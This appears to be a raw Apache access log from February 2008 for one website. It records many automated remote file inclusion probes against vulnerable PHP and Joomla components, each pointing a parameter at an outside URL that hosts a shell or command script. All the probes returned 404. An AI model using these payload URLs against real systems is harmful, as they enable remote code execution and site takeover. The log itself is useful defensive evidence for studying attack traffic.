81.182.65.59 - - [25/Feb/2008:09:06:29 -0800] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/kang_crew/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.182.65.59 - - [25/Feb/2008:09:06:29 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/kang_crew/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.23.150 - - [25/Feb/2008:09:06:30 -0800] "GET /tmp/ HTTP/1.0" 200 1657 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.199.215.57 - - [25/Feb/2008:09:06:31 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/kang_crew/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.4.231 - - [25/Feb/2008:09:06:47 -0800] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.kool-wallpapers.com//photos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.4.231 - - [25/Feb/2008:09:06:48 -0800] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.kool-wallpapers.com//photos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.4.231 - - [25/Feb/2008:09:06:48 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.kool-wallpapers.com//photos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.136.250.22 - - [25/Feb/2008:09:07:32 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.71.89.170 - - [25/Feb/2008:09:07:53 -0800] "GET /logs//inc/cmses/aedatingCMS.php?dir[inc]=http://www.shearmanmitchell.com//design/components/com_logout/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.71.89.170 - - [25/Feb/2008:09:07:53 -0800] "GET /logs//inc/cmses/aedatingCMS.php?dir[inc]=http://www.shearmanmitchell.com//design/components/com_logout/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.71.89.170 - - [25/Feb/2008:09:07:53 -0800] "GET //inc/cmses/aedatingCMS.php?dir[inc]=http://www.shearmanmitchell.com//design/components/com_logout/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.71.89.170 - - [25/Feb/2008:09:07:53 -0800] "GET //inc/cmses/aedatingCMS.php?dir[inc]=http://www.shearmanmitchell.com//design/components/com_logout/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.136.250.22 - - [25/Feb/2008:09:08:07 -0800] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.136.250.22 - - [25/Feb/2008:09:08:08 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.136.250.22 - - [25/Feb/2008:09:08:09 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.230.4.231 - - [25/Feb/2008:09:08:34 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.kool-wallpapers.com//photos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.228.173 - - [25/Feb/2008:09:08:51 -0800] "GET /logs/access_080201.log//modules/TotalCalendar/config.php?inc_dir=http://madbox.ru/administrator/components/com_smf/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.228.173 - - [25/Feb/2008:09:08:51 -0800] "GET //modules/TotalCalendar/config.php?inc_dir=http://madbox.ru/administrator/components/com_smf/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.228.173 - - [25/Feb/2008:09:08:52 -0800] "GET /logs//modules/TotalCalendar/config.php?inc_dir=http://madbox.ru/administrator/components/com_smf/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.58.176 - - [25/Feb/2008:09:08:56 -0800] "GET /logs/access_080122.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.193.228.173 - - [25/Feb/2008:09:09:35 -0800] "GET /logs/access_080123.log//modules/TotalCalendar/config.php?inc_dir=http://madbox.ru/administrator/components/com_smf/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.28.156 - - [25/Feb/2008:09:09:38 -0800] "GET /tmp/sess_fb6852d2fe7a751d1165e517a2b13ad1 HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.188.66.23 - - [25/Feb/2008:09:09:46 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [25/Feb/2008:09:09:46 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
74.6.22.154 - - [25/Feb/2008:09:10:41 -0800] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20071214 BonEcho/2.0.0.4" "www.dmulk.com"
194.79.75.195 - - [25/Feb/2008:09:11:46 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.89.97 - - [25/Feb/2008:09:11:46 -0800] "GET /impex/ImpExData.phpsystempath=http://suwung.890m.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
72.29.89.97 - - [25/Feb/2008:09:11:46 -0800] "GET /logs/impex/ImpExData.phpsystempath=http://suwung.890m.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
62.75.193.193 - - [25/Feb/2008:09:13:33 -0800] "GET //vwar/includes/get_header.php?vwar_root=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.188.66.23 - - [25/Feb/2008:09:14:07 -0800] "GET /logs/access_080108.log/convert/mvcw.php?vwar_root=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [25/Feb/2008:09:14:08 -0800] "GET /logs/access_080108.log/convert/mvcw.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [25/Feb/2008:09:14:08 -0800] "GET /convert/mvcw.php?vwar_root=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [25/Feb/2008:09:14:09 -0800] "GET /convert/mvcw.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [25/Feb/2008:09:14:09 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [25/Feb/2008:09:14:10 -0800] "GET /logs/convert/mvcw.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
212.227.96.89 - - [25/Feb/2008:09:14:18 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.96.89 - - [25/Feb/2008:09:14:19 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.96.89 - - [25/Feb/2008:09:14:19 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.148.20.146 - - [25/Feb/2008:09:14:27 -0800] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.148.20.146 - - [25/Feb/2008:09:14:28 -0800] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.148.20.146 - - [25/Feb/2008:09:14:28 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.136.250.22 - - [25/Feb/2008:09:14:33 -0800] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.188.66.23 - - [25/Feb/2008:09:14:40 -0800] "GET /logs/access_080108.log/convert/mvcw.php?step=1&vwar_root=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [25/Feb/2008:09:14:41 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [25/Feb/2008:09:14:42 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.19.235 - - [25/Feb/2008:09:15:01 -0800] "GET /megumi/?M=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
91.192.194.37 - - [25/Feb/2008:09:15:28 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sambis.ru/forum/files/sambis.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.239.78.91 - - [25/Feb/2008:09:15:30 -0800] "GET /logs/access_080131.log/index.php?pagina=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.239.78.91 - - [25/Feb/2008:09:15:31 -0800] "GET /index.php?pagina=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.239.78.91 - - [25/Feb/2008:09:15:31 -0800] "GET /logs/index.php?pagina=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.148.20.146 - - [25/Feb/2008:09:15:39 -0800] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.148.20.146 - - [25/Feb/2008:09:15:39 -0800] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.148.20.146 - - [25/Feb/2008:09:15:39 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.79.75.195 - - [25/Feb/2008:09:16:13 -0800] "GET /administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.246.89 - - [25/Feb/2008:09:16:24 -0800] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
209.200.246.89 - - [25/Feb/2008:09:16:25 -0800] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
209.200.246.89 - - [25/Feb/2008:09:16:25 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
193.188.66.23 - - [25/Feb/2008:09:16:36 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [25/Feb/2008:09:16:37 -0800] "GET /logs/access_071221.log/convert/mvcw.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
194.79.75.195 - - [25/Feb/2008:09:16:38 -0800] "GET /logs/access_071230.log/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.79.75.195 - - [25/Feb/2008:09:16:39 -0800] "GET /logs/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.148.20.146 - - [25/Feb/2008:09:16:43 -0800] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.148.20.146 - - [25/Feb/2008:09:16:44 -0800] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.148.20.146 - - [25/Feb/2008:09:16:44 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:09:16:51 -0800] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:09:16:51 -0800] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:09:16:51 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.188.66.23 - - [25/Feb/2008:09:17:00 -0800] "GET /logs/access_071221.log/convert/mvcw.php?step=1&vwar_root=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.166.35.71 - - [25/Feb/2008:09:17:21 -0800] "GET /logs/access_080131.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ilegais.xpg.com.br/www??????????????????????????http://ilegals.ifrance.com/enos???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.237.144.235 - - [25/Feb/2008:09:17:21 -0800] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.serwis.wroc.pl/sorceid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
88.166.35.71 - - [25/Feb/2008:09:17:21 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.ilegais.xpg.com.br/www??????????????????????????http://ilegals.ifrance.com/enos???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.237.144.235 - - [25/Feb/2008:09:17:21 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.serwis.wroc.pl/sorceid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [25/Feb/2008:09:17:22 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.serwis.wroc.pl/sorceid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
88.166.35.71 - - [25/Feb/2008:09:17:22 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ilegais.xpg.com.br/www??????????????????????????http://ilegals.ifrance.com/enos???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.230.4.231 - - [25/Feb/2008:09:17:28 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://geocities.com/pass_tamia/echoscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.237.144.235 - - [25/Feb/2008:09:17:34 -0800] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://www.serwis.wroc.pl/sorceid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.182.65.59 - - [25/Feb/2008:09:18:32 -0800] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.geocities.com/kang_crew/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.182.65.59 - - [25/Feb/2008:09:18:34 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.geocities.com/kang_crew/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.199.215.57 - - [25/Feb/2008:09:18:36 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.geocities.com/kang_crew/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.10.90 - - [25/Feb/2008:09:18:45 -0800] "GET /logs//templates/default/header.inc.php?menu=http://www.geocities.com/giwel/garasi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
222.122.160.142 - - [25/Feb/2008:09:18:46 -0800] "GET /logs/access_080123.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/putraaja_85/shell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.160.142 - - [25/Feb/2008:09:18:46 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/putraaja_85/shell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.160.142 - - [25/Feb/2008:09:18:47 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/putraaja_85/shell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.10.90 - - [25/Feb/2008:09:18:47 -0800] "GET //templates/default/header.inc.php?menu=http://www.geocities.com/giwel/garasi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:09:18:51 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:09:18:51 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:09:18:52 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:09:18:57 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:09:18:57 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:09:18:57 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:09:19:04 -0800] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.gressenberger.at/contenido//logs/ascomand.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:09:19:05 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.gressenberger.at/contenido//logs/ascomand.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:09:19:05 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.gressenberger.at/contenido//logs/ascomand.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.193.193 - - [25/Feb/2008:09:20:45 -0800] "GET /logs/access_080201.log//vwar/includes/get_header.php?vwar_root=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.193.193 - - [25/Feb/2008:09:20:45 -0800] "GET /logs//vwar/includes/get_header.php?vwar_root=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.79.75.195 - - [25/Feb/2008:09:21:04 -0800] "GET /logs/access.log/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.193.193 - - [25/Feb/2008:09:21:17 -0800] "GET /logs/access_080118.log//vwar/includes/get_header.php?vwar_root=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:09:21:31 -0800] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:09:21:31 -0800] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:09:21:31 -0800] "GET //Neos_Chronos/header.php?base_folder=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:09:21:31 -0800] "GET //Neos_Chronos/header.php?base_folder=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:09:21:32 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:09:21:32 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.199.215.57 - - [25/Feb/2008:09:22:16 -0800] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/kang_crew/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.103.76 - - [25/Feb/2008:09:22:26 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:09:22:52 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:09:22:52 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.103.76 - - [25/Feb/2008:09:23:36 -0800] "GET /administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [25/Feb/2008:09:23:52 -0800] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [25/Feb/2008:09:23:53 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [25/Feb/2008:09:23:53 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:09:24:12 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:09:24:13 -0800] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:09:24:13 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
